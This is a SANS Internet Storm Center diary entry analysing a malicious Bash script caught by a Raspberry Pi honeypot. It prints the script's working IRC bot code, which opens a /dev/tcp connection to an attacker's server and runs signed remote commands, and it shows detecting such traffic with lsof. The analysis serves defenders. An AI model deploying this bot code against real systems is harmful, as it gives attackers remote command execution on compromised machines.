Threat Level: green Handler on Duty: Xavier Mertens

SANS ISC: Internet Storm Center - SANS Internet Storm Center Internet Storm Center


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Last Daily Podcast (Wed, Apr 25th):Amazon #BGP Hijack; #Apple Updates; MikroTik Update

Latest Diaries

Malicious Network Traffic From /bin/bash

Published: 2018-04-25
Last Updated: 2018-04-25 06:50:25 UTC
by Xavier Mertens (Version: 1)
0 comment(s)

One of our readers from Germany sent me a malicious shell script captured by our honeypot[1] running on his Raspberry.  It's a simple UNIX Bash script that performs a bunch of malicious tasks:

  • Kills existing crypto miner processes (classic action these days)
  • Changes the password of the user 'pi' and adds an SSH key 
  • Changes the DNS resolver configuration and add some DNS blackholes in /etc/hosts (redirecting to 127.0.0.1)
  • Creates an IRC bot
  • Installs extra tools like zmap and sshpass
  • Installs itself in /etc/rc.local for persistence

The script itself is not new, it was already spotted in July 2017 but it looks to be slightly modified and was uploaded recently to VT[2] (current score is 9/59). The most interesting part of the script is the ability to run a simple IRC bot in using Bash commands. No need for a high-level language. Bash has a very interesting feature for years that not many people are aware of. You can generate network flows using standard redirections. By default, a UNIX process has always the following file descriptors available: 0 (/dev/stdin), 1 (/dev/stdout) and 2 (/dev/stderr). You can use them in commands like:

$ echo "Hello world" >/dev/stderr

In the same way, Bash can use /dev/tcp or /dev/udp to generate network flow. The syntax is /dev/<proto>/>host>/>port>.

That's the feature used in the sample. Here is how to create a simple bot (the code has been beautified):

eval 'exec 3<>/dev/tcp/$ircserver/6667;'
if [[ ! "$?" -eq 0 ]] ; then
    continue
fi
eval 'printf "NICK $NICK\r\n" >&3;'
if [[ ! "$?" -eq 0 ]] ; then
    continue
fi
eval 'printf "USER user 8 * :IRC hi\r\n" >&3;'
if [[ ! "$?" -eq 0 ]] ; then
    continue
fi
# Main loop
while [ true ]; do
    eval "read msg_in <&3;"
    if [[ ! "$?" -eq 0 ]] ; then
        break
    fi
    if  [[ "$msg_in" =~ "PING" ]] ; then
        printf "PONG %s\n" "${msg_in:5}";
        eval 'printf "PONG %s\r\n" "${msg_in:5}" >&3;'
        if [[ ! "$?" -eq 0 ]] ; then
            break
        fi
        sleep 1
        eval 'printf "JOIN #biret\r\n" >&3;'
        if [[ ! "$?" -eq 0 ]] ; then
            break
        fi
    elif [[ "$msg_in" =~ "PRIVMSG" ]] ; then
        privmsg_h=$(echo $msg_in| cut -d':' -f 3)
        privmsg_data=$(echo $msg_in| cut -d':' -f 4)
        privmsg_nick=$(echo $msg_in| cut -d':' -f 2 | cut -d'!' -f 1)
        hash=`echo $privmsg_data | base64 -d -i | md5sum | awk -F' ' '{print $1}'`
        sign=`echo $privmsg_h | base64 -d -i | openssl rsautl -verify -inkey /tmp/public.pem -pubin`

        if [[ "$sign" == "$hash" ]] ; then
            CMD=`echo $privmsg_data | base64 -d -i`
            RES=`bash -c "$CMD" | base64 -w 0`
            eval 'printf "PRIVMSG $privmsg_nick :$RES\r\n" >&3;'
            if [[ ! "$?" -eq 0 ]] ; then
                break
            fi
        fi
    fi
done

The magic line is the first one which created a new file descriptor ('3') that will be used to read/write to the TCP session established with the IRC server on port 6667. The attacker is able to submit commands to the bot via private messages (once authenticated). The result of the command is sent back. 

Be aware that not all Bash binaries have this feature enabled by default (for security reasons). If you want to use this specific feature, you can always recompile a Bash with the following directive '--enable-net-redirections'. This can be helpful in many cases. Example to grab data from a remote server without external tools:

exec 5<> /dev/tcp/blog.rootshell.be/80
printf "GET / HTTP/1.0\nHost: blog.rootshell.be\n" >&5
cat <&5
exec 5>&-

A simple way to detect this behaviour is to search for network flows generated by /bin/bash processed. Example using lsof[3]:

# lsof -i | grep bash
bash      81084 xavier    5u  IPv4 0x1cbc30b70d8a7879      0t0  TCP xxxxx.rootshell.be:57253->blog.rootshell.be:http (ESTABLISHED)

[1] https://isc.sans.edu/honeypot.html
[2] https://www.virustotal.com/#/file/ce53ae1c4f43f9f63b61fa1abd675cb8c0893aa3ffb50506fc401c5978318f74/detection
[3] https://www.forensicswiki.org/wiki/Lsof

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

0 comment(s)

If you have more information or corrections regarding our diary, please share.

Recent Diaries

Apple Patches iOS, Safari and MacOS
Apr 24th 2018
1 day ago by Johannes (0 comments)

The real value of an IOC?
Apr 24th 2018
1 day ago by Xme (0 comments)

New IE 0-day in the wild
Apr 23rd 2018
2 days ago by DidierStevens (2 comments)

A malicious word document with a VBA form - video
Apr 21st 2018
3 days ago by DidierStevens (0 comments)

Malspam pushing ransomware using two layers of password protection to avoid detection
Apr 20th 2018
5 days ago by Brad (0 comments)

Back to Basics: Backups and Data Recovery "The Home Office Edition"
Apr 19th 2018
5 days ago by Richard (2 comments)

Webshell looking for interesting files
Apr 18th 2018
1 week ago by Xme (0 comments)

View All Diaries →

Latest Discussions

MinerPool Threat Feed info
created Apr 4th 2018
2 weeks ago by Anonymous (0 replies)

DShield on RPi returns no mySQL when running /home/pi/install/dshield/bin/status.sh
created Mar 29th 2018
3 weeks ago by nekton89 (0 replies)

Splunk: Any way to fetch logs via ssh
created Mar 15th 2018
1 month ago by Anonymous (2 replies)

Possible new worm activity
created Mar 13th 2018
1 month ago by Anonymous (0 replies)

Detecting the memcached issue
created Mar 9th 2018
1 month ago by David (0 replies)

View All Forums →

Latest News

View All News →

Top Diaries

Wide-scale Petya variant ransomware attack noted
Jun 27th 2017
9 months ago by Brad (6 comments)

Using a Raspberry Pi honeypot to contribute data to DShield/ISC
Aug 3rd 2017
8 months ago by Johannes (16 comments)

Second Google Chrome Extension Banker Malware in Two Weeks
Aug 29th 2017
7 months ago by Renato (0 comments)

Detection Lab: Visibility & Introspection for Defenders
Dec 15th 2017
4 months ago by Russ McRee (2 comments)

A malicious word document with a VBA form - video
Apr 21st 2018
3 days ago by DidierStevens (0 comments)